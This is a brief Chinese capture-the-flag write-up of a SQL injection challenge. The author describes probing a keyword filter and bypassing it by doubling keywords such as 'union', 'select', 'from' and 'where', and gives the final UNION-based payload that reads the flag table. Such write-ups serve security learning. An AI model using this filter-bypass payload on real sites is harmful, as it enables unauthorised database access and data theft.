其实感觉确实不难,不过一些比较看经验的地方没有把握好,导致一直没有出flag
首先,看到这道题,题目很明确,注入。但是他过滤了一些东西,至于是什么,我们要试一下才知道。
首先,我们上去就是构造联合查询:
select * from table where id='1' union select 1, flag from flag where '1'='1
然后,我们发现,关键字全部消失了,说明被过滤了,然后我们尝试大小写绕过,发现不行,我猜测这里是preg_replace加了\s,然后那用写两次来绕过,发现出现了些问题,于是我们在里面加个空格,发现可以,拿到了flag
最终的payload:
select * from table where id='1' uniunion+on+selselect+ect+flag+frfrom+om+flag+whewhere+re +'1'='1
